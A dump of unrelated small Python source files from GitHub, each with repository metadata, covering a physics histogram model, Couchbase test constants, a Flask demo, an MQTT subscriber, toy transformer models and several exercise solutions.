| kaustav1808/competitive-programming | TopCoder/DPMinCoinSum.py | DPMinCoinSum.py | py | 383 | python | en | code | 0 | github-code | 90 |
34385422327 | import numpy as np
import math
#The Modell for the 2D Jensen shannonn data
class Model_2D:
def __init__(
self,
is_data: bool,
size: int,
sample_size: int = 2000,
):
# Constant parameters
self.num_syst = 1
self.sample_size = sample_size
# Histograms
self.nbins = 5
self.x_min = 0
self.x_max = 60
self.y_min = 0
self.y_max = 60
# Background Model
self.beta = 10
# Model specific
self.is_data = is_data
self.size = size
# self.signal_size = signal_size
# if self.signal_size >= self.size:
# raise ValueError(
# f"ERROR: Invalid signal size ({self.signal_size}). Should be < background size ({self.size})."
# )
# self.background_fraction = 1.0 - self.signal_fraction
# self.signal_size = math.floor(self.size * self.signal_fraction)
self.background_size = self.size
#Assume uncorrelated and identical background
X = np.random.exponential(self.beta, self.background_size)
Y = np.random.exponential(self.beta, self.background_size)
# build model
background_hist, xedges, yedges = np.histogram2d(X, Y, bins=(self.nbins,self.nbins), range=[[self.x_min,self.x_max],[self.y_min,self.y_max]], density=None, weights=None)
background_hist = background_hist.T
self.values = background_hist
self.xbins = xedges
self.ybins = yedges
# calculate uncertanties
self.stats_uncert = np.sqrt(self.values)
# self.normalized_stats_variations = np.random.normal(size=(self.sample_size, 1))
# self.stats_uncert[self.stats_uncert == 0] = 1
self.syst_uncert = []
self.normalized_syst_variations = []
self.normalized_syst_variations_for_data_sampling = []
if not is_data:
for i in range(self.num_syst):
self.syst_uncert.append(self.stats_uncert / (i + 4))
self.normalized_syst_variations.append(
np.random.normal(size=(self.sample_size, 1))
)
self.normalized_syst_variations_for_data_sampling.append(
np.random.normal(size=(1, 1))
)
def sample(self, is_data=False):
#The 2D creation of toys
normalized_systs = self.normalized_syst_variations
if is_data:
normalized_systs = self.normalized_syst_variations_for_data_sampling
result = []
for idx_syst, syst in enumerate(self.syst_uncert):
if not self.is_data:
for systs in normalized_systs[idx_syst]:
toy = []
for i in range(self.nbins):
new_values = np.reshape(self.values[i], (1, self.values[i].shape[0]))
new_values = (
new_values
+ np.reshape(syst[i], (1, syst[i].shape[0])) * systs
)
toy.append( np.random.poisson(
np.max([new_values, np.zeros_like(new_values)], axis=0)
))
result.append(np.reshape(toy ,(self.nbins,self.nbins)))
else:
raise ValueError("ERROR: Can not sample from data model.")
return result
def sample_1D(self,values_1d,is_data=False):
if is_data:
normalized_systs = self.normalized_syst_variations_for_data_sampling
result = []
#Recalculate of the uncertanties for the 1D Modell
stats_uncert = np.sqrt(values_1d)
syst_uncert = []
normalized_syst_variations = []
normalized_syst_variations_for_data_sampling = []
if not is_data:
for i in range(self.num_syst):
syst_uncert.append(stats_uncert / (i + 4))
normalized_syst_variations.append(
np.random.normal(size=(self.sample_size, 1))
)
normalized_syst_variations_for_data_sampling.append(
np.random.normal(size=(1, 1))
)
normalized_systs = normalized_syst_variations
if not self.is_data:
new_values = np.reshape(values_1d, (1, values_1d.shape[0]))
for idx_syst, syst in enumerate(syst_uncert):
new_values = (
new_values
+ np.reshape(syst, (1, syst.shape[0])) * normalized_systs[idx_syst]
)
return np.random.poisson(
np.max([new_values, np.zeros_like(new_values)], axis=0)
)
raise ValueError("ERROR: Can not sample from data model.")
@property
def total_uncert(self):
if self.is_data:
return self.stats_uncert
squared_sum = self.stats_uncert * self.stats_uncert
for syst in self.syst_uncert:
squared_sum += syst * syst
return np.sqrt(squared_sum)
def get_data_sample(self,mu,sigma, signal_size=0):
# build signal
Signal = np.random.multivariate_normal(mean=mu,cov=sigma,size=signal_size)
Signal_hist, xedges, yedges = np.histogram2d(Signal[:,0], Signal[:,1], bins=(self.nbins,self.nbins), range=[[self.x_min,self.x_max],[self.y_min,self.y_max]], density=None, weights=None)
Signal_hist = Signal_hist.T
combined_hist = self.values + Signal_hist
return combined_hist
| CMSMUSiC/HDiv | Build_gc11/data_models_2D.py | data_models_2D.py | py | 5,632 | python | en | code | 0 | github-code | 90 |
28758383637 | '''Crie um programa que leia o ano de nascimento de sete pessoas. No final, mostre quantas pessoas ainda não atingiram a maioridade e quantas já são maiores.
'''
from datetime import date
ano_atual = date.today().year
total_maior = 0
total_menor = 0
for pessoas in range(1, 8):
data_de_nascimento = int(input(f'Em que ano a {pessoas}ª pessoa nasceu? '))
idade = ano_atual - data_de_nascimento
if idade >= 21:
total_maior += 1
else:
total_menor += 1
print(f'Ao todo temos {total_maior} pessoas maiores de idade')
print(f'E temos {total_menor} menores de idade')
| robsonlnx/exercicios | ex054.py | ex054.py | py | 606 | python | pt | code | 0 | github-code | 90 |
39711008999 | NS_SERVER_TIMEOUT = 120
STANDARD_BUCKET_PORT = 11217
COUCHBASE_SINGLE_DEFAULT_INI_PATH = "/opt/couchbase/etc/couchdb/default.ini"
MEMBASE_DATA_PATH = "/opt/membase/var/lib/membase/data/"
MEMBASE_VERSIONS = ["1.5.4", "1.6.5.4-win64", "1.7.0", "1.7.1", "1.7.1.1", "1.7.2"]
COUCHBASE_DATA_PATH = "/opt/couchbase/var/lib/couchbase/data/"
# remember update WIN_REGISTER_ID also when update COUCHBASE_VERSION
COUCHBASE_VERSIONS = ["1.8.0r", "1.8.0", "1.8.1", "2.0.0", "2.0.1", "2.0.2", "2.1.0", "2.1.1", "2.2.0",
"2.2.1", "2.5.0", "2.5.1", "2.5.2", "3.0.0", "3.0.1", "3.0.2", "3.5.0"]
COUCHBASE_VERSION_2 = ["2.0.0", "2.0.1", "2.0.2", "2.1.0", "2.1.1", "2.2.0", "2.2.1", "2.5.0", "2.5.1",
"2.5.2"]
COUCHBASE_VERSION_3 = ["3.0.0", "3.0.1", "3.0.2", "3.5.0"]
WIN_CB_VERSION_3 = ["3.0.0", "3.0.1", "3.0.2", "3.5.0"]
WIN_MEMBASE_DATA_PATH = '/cygdrive/c/Program\ Files/Membase/Server/var/lib/membase/data/'
WIN_COUCHBASE_DATA_PATH = '/cygdrive/c/Program\ Files/Couchbase/Server/var/lib/couchbase/data/'
WIN_CB_PATH = "/cygdrive/c/Program Files/Couchbase/Server/"
WIN_MB_PATH = "/cygdrive/c/Program Files/Membase/Server/"
LINUX_CB_PATH = "/opt/couchbase/"
WIN_REGISTER_ID = {"1654":"70668C6B-E469-4B72-8FAD-9420736AAF8F", "170":"AF3F80E5-2CA3-409C-B59B-6E0DC805BC3F", \
"171":"73C5B189-9720-4719-8577-04B72C9DC5A2", "1711":"73C5B189-9720-4719-8577-04B72C9DC5A2", \
"172":"374CF2EC-1FBE-4BF1-880B-B58A86522BC8", "180":"D21F6541-E7EA-4B0D-B20B-4DDBAF56882B", \
"181":"A68267DB-875D-43FA-B8AB-423039843F02", "200":"9E3DC4AA-46D9-4B30-9643-2A97169F02A7", \
"201":"4D3F9646-294F-4167-8240-768C5CE2157A", "202":"7EDC64EF-43AD-48BA-ADB3-3863627881B8",
"210":"7EDC64EF-43AD-48BA-ADB3-3863627881B8", "211":"7EDC64EF-43AD-48BA-ADB3-3863627881B8",
"220":"CC4CF619-03B8-462A-8CCE-7CA1C22B337B", "221":"3A60B9BB-977B-0424-2955-75346C04C586",
"250":"22EF5D40-7518-4248-B932-4536AAB7293E", "251":"AB8A4E81-D502-AE14-6979-68E4C4658CF7",
"252":"6E10D93C-76E0-DCA4-2111-73265D001F56",
"300":"3D361F67-7170-4CB4-494C-3E4E887BC0B3", "301":"3D361F67-7170-4CB4-494C-3E4E887BC0B3",
"302":"DD309984-2414-FDF4-11AA-85A733064291", "305":"24D9F882-481C-2B04-0572-00B273CE17B3"}
""" This "220":"CC4CF619-03B8-462A-8CCE-7CA1C22B337B" is for build 2.2.0-821 and earlier
The new build register ID for 2.2.0-837 id is set in create_windows_capture_file in remote_util """
VERSION_FILE = "VERSION.txt"
MIN_COMPACTION_THRESHOLD = 2
MAX_COMPACTION_THRESHOLD = 100
MIN_TIME_VALUE = 0
MAX_TIME_MINUTE = 59
MAX_TIME_HOUR = 23
NUM_ERLANG_THREADS = 16
LINUX_COUCHBASE_BIN_PATH = "/opt/couchbase/bin/"
WIN_COUCHBASE_BIN_PATH = '/cygdrive/c/Program\ Files/Couchbase/Server/bin/'
WIN_COUCHBASE_BIN_PATH_RAW = 'C:\Program\ Files\Couchbase\Server\\bin\\'
WIN_TMP_PATH = '/cygdrive/c/tmp/'
MAC_COUCHBASE_BIN_PATH = "/Applications/Couchbase\ Server.app/Contents/Resources/couchbase-core/bin/"
MAC_CB_PATH = "/Applications/Couchbase\ Server.app/Contents/Resources/couchbase-core/"
LINUX_COUCHBASE_LOGS_PATH = '/opt/couchbase/var/lib/couchbase/logs'
WIN_COUCHBASE_LOGS_PATH = '/cygdrive/c/Program\ Files/Couchbase/Server/var/lib/couchbase/logs/'
MISSING_UBUNTU_LIB = ["libcurl3"]
LINUX_GOPATH = '/root/tuq/gocode'
WINDOWS_GOPATH = '/cygdrive/c/tuq/gocode'
LINUX_GOROOT = '/root/tuq/go'
WINDOWS_GOROOT = '/cygdrive/c/Go'
LINUX_STATIC_CONFIG = '/opt/couchbase/etc/couchbase/static_config'
LINUX_LOG_PATH = '/opt'
LINUX_CAPI_INI = '/opt/couchbase/etc/couchdb/default.d/capi.ini'
LINUX_CONFIG_FILE = '/opt/couchbase/var/lib/couchbase/config/config.dat'
LINUX_MOXI_PATH = '/opt/moxi/bin/'
LINUX_CW_LOG_PATH = "/opt/couchbase/var/lib/couchbase/tmp/"
MAC_CW_LOG_PATH = "/Applications/Couchbase\ Server.app/Contents/Resources/couchbase-core/var/lib/couchbase/tmp"
WINDOWS_CW_LOG_PATH = "/cygdrive/c/Program\ Files/Couchbase/Server/var/lib/couchbase/tmp/"
CLI_COMMANDS = ["cbbackup", "cbbrowse_logs", "cbcollect_info", "cbcompact", "cbdump-config", "cbenable_core_dumps.sh", \
"cbepctl", "cbhealthchecker", "cbrecovery", "cbreset_password", "cbrestore", "cbsasladm", "cbstats", \
"cbtransfer", "cbvbucketctl", "cbworkloadgen", "couchbase-cli", "couchbase-server", "couch_compact", \
"couchdb", "couch_dbdump", "couch_dbinfo", "couchjs", "couch_view_file_merger", "couch_view_file_sorter", \
"couch_view_group_cleanup", "couch_view_group_compactor", "couch_view_index_builder", "couch_view_index_updater", \
"ct_run", "curl", "curl-config", "derb", "dialyzer", "dump-guts", "epmd", "erl", "erlc", "escript", "genbrk", \
"gencfu", "gencnval", "genctd", "generate_cert", "genrb", "icu-config", "install", "makeconv", "mctimings", \
"memcached", "moxi", "reports", "sigar_port", "sqlite3", "to_erl", "tools", "typer", "uconv", "vbmap"]
# old url MV_LATESTBUILD_REPO = "http://builds.hq.northscale.net/latestbuilds/"
MV_LATESTBUILD_REPO = "http://latestbuilds.hq.couchbase.com/"
| DavidAlphaFox/couchbase | testrunner/lib/testconstants.py | testconstants.py | py | 5,156 | python | en | code | 0 | github-code | 90 |
4980857626 | import flask
from flask import Flask, render_template, request, Response
from Main.config import Config
from Main.project.forms import MessageForm
app = Flask(__name__)
app.config.from_object(Config)
@app.route("/", methods=['get', 'post'])
def index():
server_message = ''
client_message = ''
if request.method == 'POST':
client_message = request.form.get('message')
if client_message == 'hi':
server_message = 'Hello!'
elif client_message != '':
server_message = "How are you?"
else:
server_message = 'Enter your message:'
return render_template('index.html', message=server_message)
page_news = {'first news': "test text"}
@app.route("/news", methods=['get', 'post'])
def news():
if request.method == 'POST':
title = request.form.get('title')
content = request.form.get('content')
if title and content:
page_news[title] = content
return render_template("news.html", news=page_news)
else:
return flask.abort(404, 'Неверные параметры запроса - пустые title и/или content')
return render_template("news.html", news=page_news)
@app.route("/message", methods=['get', 'post'])
def message():
message_form = MessageForm()
return render_template("message.html", form=message_form)
@app.route('/old/')
def old_index():
return render_template('old_index.html')
@app.route('/old/<float:x>/')
def double_x(x):
y = x*2
text = f"Ваше число {x}, умноженное на 2:"
return render_template('old_index.html', text=text, number=y)
# @app.route('/<a>/<b>/<c>')
# def middle(a, b, c):
# return render_template('index.html', a=a, b=b, c=c)
@app.route('/old/<float:a>/<operator>/<float:c>/')
def calculate(a, operator, c):
return render_template('old_index.html', a=a, operator=operator, c=c)
if __name__ == '__main__':
app.run(host='127.0.0.1', port=5000, debug=True)
| skirdapa/Stepic_Web_Framework_Flask_Introduction | Main/app.py | app.py | py | 1,998 | python | en | code | 0 | github-code | 90 |
3994698248 | import sys
input = sys.stdin.readline
def iq(N, arr):
if N > 2:
a0 = arr[0]
a1 = arr[1]
a2 = arr[2]
if a1 == a0:
x = 0
else:
x = (a2 - a1) // (a1 - a0)
y = a1 - a0 * x
for i in range(0, N - 1):
if arr[i] * x + y != arr[i + 1]:
print("B")
return
print(arr[N - 1] * x + y)
elif N == 1:
print("A")
elif N == 2:
if arr[0] == arr[1]:
print(arr[0])
else:
print("A")
if __name__ == "__main__":
N = int(input().strip())
iq(N, list(map(int, input().strip().split())))
| WonyJeong/algorithm-study | WonyJeong/Soma/1111.py | 1111.py | py | 669 | python | en | code | 2 | github-code | 90 |
18380554629 | import math
A, B, C, D = map(int, input().split())
cd = (C * D) // math.gcd(C, D)
pac, qac = divmod(A, C)
pad, qad = divmod(A, D)
pacd, qacd = divmod(A, cd)
pbc, qbc = divmod(B, C)
pbd, qbd = divmod(B, D)
pbcd, qbcd = divmod(B, cd)
pac = pac - 1 if qac == 0 else pac
pad = pad - 1 if qad != 0 else pad
pacd = pacd - 1 if qacd != 0 else pacd
ans = (pbc + pbd - pbcd) - (pac + pad - pacd)
print(B - A - ans + 1)
| Aasthaengg/IBMdataset | Python_codes/p02995/s978500214.py | s978500214.py | py | 417 | python | en | code | 0 | github-code | 90 |
39090762329 | import csv
from telegram import Update
from telegram.ext import CallbackContext
import os.path
db = []
id = 0
def init_db(file_name='DB.csv'):
global db
db_file_name = file_name
db.clear()
if os.path.exists(db_file_name):
with open(db_file_name, 'r', newline='') as csv_file:
reader = csv.reader(csv_file)
for row in reader:
if(row[0] != 'ID'):
db.append(row)
# if(int(row[0]) > id):
# id = int(row[0])
else:
open(db_file_name, 'w', newline='').close()
return None
def show_db(update: Update, context: CallbackContext, file_name='DB.csv'):
with open(file_name) as f:
reader = csv.reader(f,delimiter='|')
headers = next(reader)
print(headers)
for row in reader:
print(row)
def write_db(update: Update, context: CallbackContext):
global id
global db
id += 1
db.append(id)
first_name = input('Введите имя: ')
if(first_name == ''):
print('Поле не может быть пустым!')
return
db.append(first_name)
last_name = input('Введите Фамилию: ')
if(last_name == ''):
print('Поле не может быть пустым!')
return
db.append(last_name)
phone_num = give_int('Введите телефон: ')
if(phone_num == ''):
print('Поле не может быть пустым!')
return
db.append(phone_num)
comment = input('Введите комментарий: ')
db.append(comment)
file = open ('DB.csv', 'a')
file.write(f'{db[0]}|{db[1]}|{db[2]}|{db[3]}|{db[4]}\n')
file.close()
def give_int(input_number) -> int:
'''
Функция ввода числа
'''
while True:
try:
num = int(input(input_number))
return num
except ValueError:
print('Вы ввели не число. Введите число.')
# def creating():
# file = open ('DB.csv', 'w')
# # with open (file, 'a') as data_csv:
# file.write('id | first_name | last_name | phone_num | comment\n')
# creating()
| Dimonchik39/home_work_10 | function.py | function.py | py | 2,265 | python | en | code | 0 | github-code | 90 |
23097673989 | import paho.mqtt.client as mqtt
import tkinter as tk
mqttBroker = "broker.emqx.io"
subsTopic = "StudyClub/Restu/Publis"
# Fungsi callback ketika koneksi ke broker MQTT berhasil
def on_connect(client, userdata, flags, rc):
status_label.config(text='Terhubung ke broker MQTT dengan kode: ' + str(rc))
client.subscribe(subsTopic) # Langganan ke topik yang diinginkan
# Fungsi callback ketika menerima pesan dari broker MQTT
def on_message(client, userdata, msg):
output_text.insert(tk.END, 'Pesan diterima pada topik: ' + msg.topic + '\n')
output_text.insert(tk.END, 'Isi pesan: ' + str(msg.payload.decode()) + '\n')
output_text.insert(tk.END, '--------------------------------------\n')
output_text.see(tk.END) # Auto-scroll ke bawah
# Inisialisasi client MQTT
client = mqtt.Client()
# Mengatur callback functions
client.on_connect = on_connect
client.on_message = on_message
# Menghubungkan ke broker MQTT
client.connect(mqttBroker, 1883, 60)
# Fungsi untuk keluar dari program
def exit_program():
client.disconnect()
root.destroy()
# Membuat tampilan GUI menggunakan Tkinter
root = tk.Tk()
root.title('Aplikasi MQTT Subscriber')
# Label Status
status_label = tk.Label(root, text='Status: ')
status_label.pack()
# Label Topik
topic_label = tk.Label(root, text='Topik: ' + subsTopic)
topic_label.pack()
# Output Text
output_text = tk.Text(root, height=10, width=40)
output_text.pack()
# Button Keluar
exit_button = tk.Button(root, text='Keluar', command=exit_program)
exit_button.pack()
# Loop untuk menerima pesan dan memperbarui GUI
client.loop_start()
root.mainloop()
# Tutup koneksi MQTT
client.loop_stop()
| Nuur-R/MyLab-EmbeddedProgram | python_client/MqttSubs_GUI.py | MqttSubs_GUI.py | py | 1,657 | python | id | code | 0 | github-code | 90 |
23061862097 | import get_psql_table
import pandas as pd
import matplotlib.pyplot as plt
def plot_queue_length_table(system_name,agreggate_by):
indate_table = get_psql_table.get_table('tasks.indate as time',system_name+'.tasks')
indate_table = add_queue_column(indate_table,1)
rundate_table = get_psql_table.get_table('runs.rundate as time',system_name+'.runs')
rundate_table = add_queue_column(rundate_table,-1)
stopdate_table = get_psql_table.get_table('runs.stopdate as time, runs.exittype', system_name+'.runs')
stopdate_table = add_queue_column(stopdate_table,0)
stopdate_table = alter_exittype(stopdate_table,1)
stopdate_table = drop_exittype_column(stopdate_table)
print(stopdate_table)
queue_length_table = concatenate_tables(indate_table,rundate_table,stopdate_table)
queue_length_table = queue_length_table.sort_values(by=['time'])
queue_length_table = queue_length_table.groupby(['time']).sum()
queue_length_table = queue_length_table.resample(agreggate_by).sum()
# queue_length_table.queue_length = queue_length_table.queue_length.cumsum()
queue_length_table.plot()
plt.show()
def alter_exittype(table,for_what_number):
table.loc[(table['exittype'] == 0) | (table['exittype'] == 5), 'queue_length'] = for_what_number
return table
def add_queue_column(table,default_value):
table["queue_length"] = default_value
return table
def drop_exittype_column(table):
return table.drop('exittype',axis=1)
def concatenate_tables(table_1,table_2,table_3):
supertable = pd.concat([table_1, table_2])
supertable = pd.concat([supertable, table_3])
return supertable
plot_queue_length_table('mvs10p','W') | SergeiShumilin/pyJSCC | JSCC_data_base_analisis/queue_length_improved.py | queue_length_improved.py | py | 1,696 | python | en | code | 0 | github-code | 90 |
12830586822 | import torch
from torch import nn
import torch.nn.functional as F
class Feedforward(nn.Module):
def __init__(self, input_size, hidden_size, output_size):
super(Feedforward, self).__init__()
self.input_size = input_size
self.hidden_size = hidden_size
self.output_size = output_size
self.fc1 = nn.Linear(self.input_size, self.hidden_size)
self.relu = nn.GELU()
self.fc2 = nn.Linear(self.hidden_size, self.output_size)
def forward(self, x):
hidden = self.fc1(x)
relu = self.relu(hidden)
output = self.fc2(relu)
return output
class MultiHeadSelfAttention(nn.Module):
def __init__(self, embed_dim, num_heads=8):
super(MultiHeadSelfAttention, self).__init__()
self.embed_dim = embed_dim
self.num_heads = num_heads
if embed_dim % num_heads != 0:
raise ValueError(
f"embedding dimension = {embed_dim} should be divisible by number of heads = {num_heads}"
)
self.projection_dim = embed_dim // num_heads
self.query = nn.Linear(embed_dim, embed_dim)
self.key = nn.Linear(embed_dim, embed_dim)
self.value = nn.Linear(embed_dim, embed_dim)
self.combine_heads = nn.Linear(embed_dim, embed_dim)
def attention(self, query, key, value):
score = torch.matmul(query, key.transpose(-1, -2))
dim_key = torch.tensor(key.shape[-1], dtype=torch.float32)
scaled_score = score / torch.sqrt(dim_key)
weights = nn.functional.softmax(scaled_score, dim=-1)
output = torch.matmul(weights, value)
return output
def separate_heads(self, x, batch_size):
x = x.reshape(batch_size, -1, self.num_heads, self.projection_dim)
return x.transpose(1, 2)
def forward(self, inputs):
# x.shape = [batch_size, seq_len, embedding_dim]
batch_size = inputs.shape[0]
query = self.query(inputs) # (batch_size, seq_len, embed_dim)
key = self.key(inputs) # (batch_size, seq_len, embed_dim)
value = self.value(inputs) # (batch_size, seq_len, embed_dim)
query = self.separate_heads(
query, batch_size
)
key = self.separate_heads(
key, batch_size
)
value = self.separate_heads(
value, batch_size
)
attention = self.attention(query, key, value)
attention = attention.transpose(1, 2)
concat_attention = attention.reshape(batch_size, -1, self.embed_dim)
output = self.combine_heads(concat_attention)
return output
class DecoderOnlyLayer(nn.Module):
def __init__(self, d_model, n_head, d_ff=None):
super().__init__()
if d_ff is None:
d_ff = 4*d_model
self.attn = MultiHeadSelfAttention(d_model, n_head)
self.norm1 = nn.LayerNorm(d_model)
self.ff = Feedforward(d_model, d_ff, d_model)
self.norm2 = nn.LayerNorm(d_model)
def forward(self, x):
x = x + self.norm1(self.attn(x))
x = x + self.norm2(self.ff(x))
return x
class DecoderOnly(nn.Module):
def __init__(self, n_inputs, n_outputs, n_layers, d_model, n_head):
super().__init__()
self.embed = nn.Linear(n_inputs, d_model)
self.layers = [DecoderOnlyLayer(d_model, n_head) for _ in range(n_layers)]
self.out = nn.Linear(d_model, n_outputs)
def forward(self, x):
x = self.embed(x)
pos = torch.linspace(0, x.shape[1], x.shape[1]).to(x.device)
x[:,:,0] += pos
for l in self.layers:
x = l(x)
logits = self.out(x)
return logits
class MultiLayerFeedForward(nn.Module):
def __init__(self, n_layers, n_inputs, d_model, n_outputs):
super().__init__()
self.in_layer = nn.Linear(n_inputs, d_model)
self.layers = nn.ModuleList([nn.Linear(d_model, d_model) for _ in range(n_layers)])
self.out_layer = nn.Linear(d_model, n_outputs)
def forward(self, x):
x = F.gelu(self.in_layer(x))
for l in self.layers:
x = F.gelu(l(x))
x = self.out_layer(x)
return x
class TestModel(nn.Module):
def __init__(self, n_inputs, d_model, n_outputs):
super().__init__()
self.ff1 = Feedforward(n_inputs, d_model, n_outputs)
self.gelu = nn.GELU()
self.ff2 = Feedforward(d_model, d_model, n_outputs)
def forward(self, x):
return self.ff1(x)
#return self.ff2(self.gelu(self.ff1(x))) | Baidicoot/rl-test | goofy.py | goofy.py | py | 4,556 | python | en | code | 0 | github-code | 90 |
16771423376 | import random as rd
import csv
# Dicionário com as informações a serem selecionadas
dic = {
"idade": ['18-24 anos', '25-35 anos', '36-49 anos', 'Mais de 50 anos'],
"genero": ["Masculino", "Feminino", "Outros", "Prefiro não dizer"],
"estado": ['Acre', 'Alagoas', 'Amapa', 'Amazonas', 'Bahia', 'Ceara', 'Distrito Federal', 'Espirito Santo',
'Goias', 'Maranhao', 'Mato Grosso', 'Mato Grosso do Sul', 'Minas Gerais', 'Para', 'Paraiba', 'Parana',
'Pernambuco', 'Piaui', 'Rio de Janeiro', 'Rio Grande do Norte', 'Rio Grande do Sul', 'Rondonia', 'Roraima',
'Santa Catarina', 'Sao Paulo', 'Sergipe', 'Tocantins'],
"frequencia": ['Diariamente', '2-4 vezes na semana', 'Semanalmente', 'Quinzenalmente'],
"combustivel": ['Gasolina comum', 'Gasolina Aditivada', 'GNV', 'Etanol', 'Diesel', 'Elétrico'],
"abastecimento": ['Sempre completo', 'Completo as vezes', 'Conforme o uso'],
"renda": ['Lazer', 'Locomoção para o trabalho', 'Principal fonte de renda'],
"posto": ['Ipiranga', 'BR', 'Shell', 'Petrobras', 'Texaco', 'Ale'],
"importancia": ['Preço', 'Localização', 'Qualidade do combustível', 'Loja de Conveniência', 'Atendimento', 'Serviços Adicionais'],
"fidelidade-postos": ['Sim', 'Não'],
"aplicativo": ['Conheço mas não utilizo', 'Conheço e utilizo', 'Não conheço', 'Utilizo outros'],
"motivo": ['Não utilizo aplicativos/programas de fidelidade', 'Descontos em abastecimento/serviços', 'Cashback'],
"conveniencia": ['Sim', 'Não'],
"classificacao": ['0', '1', '2', '3', '4', '5']
}
# Função que gera os dados de forma aleatória e salva em um novo dicionário
def gerar_dados():
dados = {}
dados['idade'] = dic['idade'][rd.randint(0, len(dic['idade']))-1]
dados['genero'] = dic['genero'][rd.randint(0, len(dic['genero']))-1]
dados['estado'] = dic['estado'][rd.randint(0, len(dic['estado']))-1]
dados['frequencia'] = dic['frequencia'][rd.randint(0, len(dic['frequencia']))-1]
dados['combustivel'] = dic['combustivel'][rd.randint(0, len(dic['combustivel']))-1]
dados['abastecimento'] = dic['abastecimento'][rd.randint(0, len(dic['abastecimento']))-1]
dados['renda'] = dic['renda'][rd.randint(0, len(dic['renda']))-1]
dados['posto'] = dic['posto'][rd.randint(0, len(dic['posto']))-1]
dados['importancia'] = dic['importancia'][rd.randint(0, len(dic['importancia']))-1]
dados['fidelidade-postos'] = dic['fidelidade-postos'][rd.randint(0, len(dic['fidelidade-postos']))-1]
dados['aplicativo'] = dic['aplicativo'][rd.randint(0, len(dic['aplicativo']))-1]
dados['motivo'] = dic['motivo'][rd.randint(0, len(dic['motivo']))-1]
dados['conveniencia'] = dic['conveniencia'][rd.randint(0, len(dic['conveniencia']))-1]
dados['classificacao'] = dic['classificacao'][rd.randint(0, len(dic['classificacao']))-1]
return dados
# Função que salva os dados gerados em um arquivo CSV
def gerar_linha_csv():
dados = gerar_dados()
with open('respostas.csv', 'a', newline='', encoding='utf-8') as arquivo:
escrever = csv.writer(arquivo)
escrever.writerow([dados['idade'], dados['genero'], dados['estado'],
dados['frequencia'], dados['combustivel'], dados['abastecimento'], dados['renda'],
dados['posto'], dados['importancia'], dados['fidelidade-postos'],dados['aplicativo'],
dados['motivo'], dados['conveniencia'], dados['classificacao']])
# Função que define a quantidade de linhas a serem geradas
def salvar_dados(qtd):
for i in range(qtd):
gerar_linha_csv()
# Chamamento da função onde a quantidade de linhas a serem geradas deve ser informada dentro dos parênteses
salvar_dados()
| ViniVin1/projeto-ipiranga | gerar-respostas.py | gerar-respostas.py | py | 3,794 | python | pt | code | 0 | github-code | 90 |
23695297922 | import pandas as pd
import pandas_datareader.data as web
import numpy as np
import matplotlib.pyplot as plt
# NIKKEI225のデータを取得
df = web.DataReader("NIKKEI225", 'fred', '1990-01-01', '2023-06-08')
# 対数変換を行う
df['LogReturn'] = np.log(df['NIKKEI225']).diff()
# プロット
plt.figure(figsize=(10, 5))
plt.plot(df.index, df['LogReturn'], label='NIKKEI225 Log Returns')
plt.title('NIKKEI225 Log Returns')
plt.xlabel('Date')
plt.ylabel('Log Return')
plt.legend()
plt.grid(True)
plt.show()
| Kouhei-Takagi/PythonAlmostEveryday | N225LogTrend/main.py | main.py | py | 514 | python | en | code | 1 | github-code | 90 |
18221398089 | n=int(input())
y=list(map(int,input().split()))
from collections import Counter
lhs=Counter([j+y[j] for j in range(n)])
rhs=Counter([j-y[j] for j in range(n)])
count=0
for i in lhs:
if i in rhs:
count+=lhs[i]*rhs[i]
print(count)
| Aasthaengg/IBMdataset | Python_codes/p02691/s742005940.py | s742005940.py | py | 239 | python | en | code | 0 | github-code | 90 |
14079723371 | # -*- coding: utf-8 -*-
from base import PollingModule
import urllib2
import json
class BitcoinPriceModule(PollingModule):
bars = u' ▁▂▃▄▅▆▇█'
def __init__(self, cfg):
PollingModule.__init__(self, 'bitcoin')
self.buy_price = "?"
self.sell_price = "?"
self.config(cfg)
self.history = [-1] * 10
def config(self, cfg):
self.interval = cfg.get('interval', 600)
self.coinbase_api_endpoint = cfg.get('coinbase_api_endpoint', 'https://coinbase.com/api')
self.coinbase_api_version = cfg.get('coinbase_api_version', 'v1')
self.labelColor = cfg.get('label_color', "#AAAAAA")
self.amountColor = cfg.get('amount_color', "#348eda")
self.channels = {'buy_price': False, 'sell_price': False}
self.history = [-1] * cfg.get('history_len', 10)
self.hist_scale = cfg.get('history_scale', 1)
def onUpdate(self):
if self.channels['buy_price'] or self.channels['history']:
self.buy_price = self.coinbase_query(action='buy')
if self.channels['sell_price']:
self.sell_price = self.coinbase_query(action='sell')
if self.channels['history']:
self.history = self.history[1:] + [float(self.buy_price)]
return True
def coinbase_query(self, action='buy'):
api_endpoint = "%s/%s/prices/%s" % (self.coinbase_api_endpoint, self.coinbase_api_version, action)
response = urllib2.urlopen(api_endpoint)
json_string = response.read()
obj = json.loads(json_string)
return obj["subtotal"]["amount"]
def onDraw(self):
if self.channels['buy_price']:
port = self.ports['buy_price']
port.clear()
port.add("[Buy:", color=self.labelColor)
port.add(self.buy_price, color=self.amountColor, sepWidth=0)
port.add("]", color=self.labelColor)
if self.channels['sell_price']:
port = self.ports['sell_price']
port.clear()
port.add("[Sell:", color=self.labelColor)
port.add(self.sell_price, color=self.amountColor, sepWidth=0)
port.add("]", color=self.labelColor)
if self.channels['history']:
port = self.ports['history']
port.clear()
realvals = [x for x in self.history if x != -1]
xavg = sum(realvals) / len(realvals)
xmin = min(realvals)
xmax = max(realvals)
baseline = xavg
if xavg + 4 * self.hist_scale < xmax:
baseline = xmax - 4 * self.hist_scale
if xavg - 4 * self.hist_scale > xmin:
baseline = xmin + 4 * self.hist_scale
port.add("[", color=self.labelColor, sepWidth=0)
for h in self.history:
if h == -1:
port.add(self.bars[4], color=self.amountColor, sepWidth=0)
else:
val = 4 + int((h - xavg) / self.hist_scale)
val = max(min(val, 8), 0)
port.add(self.bars[val], color=self.amountColor, sepWidth=0)
port.add("]", color=self.labelColor)
| soupytwist/i3pandabar | module_bitcoin.py | module_bitcoin.py | py | 3,227 | python | en | code | 0 | github-code | 90 |
29528950120 | import math
from matplotlib import pyplot as plt
def CalcExp(x):
return math.e ** x
def DistributionF(firstChi2, secondChi2):
randomVariables = []
length = len(firstChi2)
for i in range(0, length):
randomVariable = firstChi2[i] / secondChi2[i]
randomVariables.append(randomVariable)
return randomVariables
def DistributionExponential(normalDist):
randomVariables = []
length = len(normalDist)
for i in range(0, length):
if normalDist[i] <= 0:
continue
randomVariable = -math.log10(normalDist[i]) / 100
randomVariables.append(randomVariable)
return randomVariables
def DistributionGamma(alfa, betta, firstRandomNumbers, secondRandomNumbers, totalVariables):
a = 1 / math.sqrt(2 * alfa - 1)
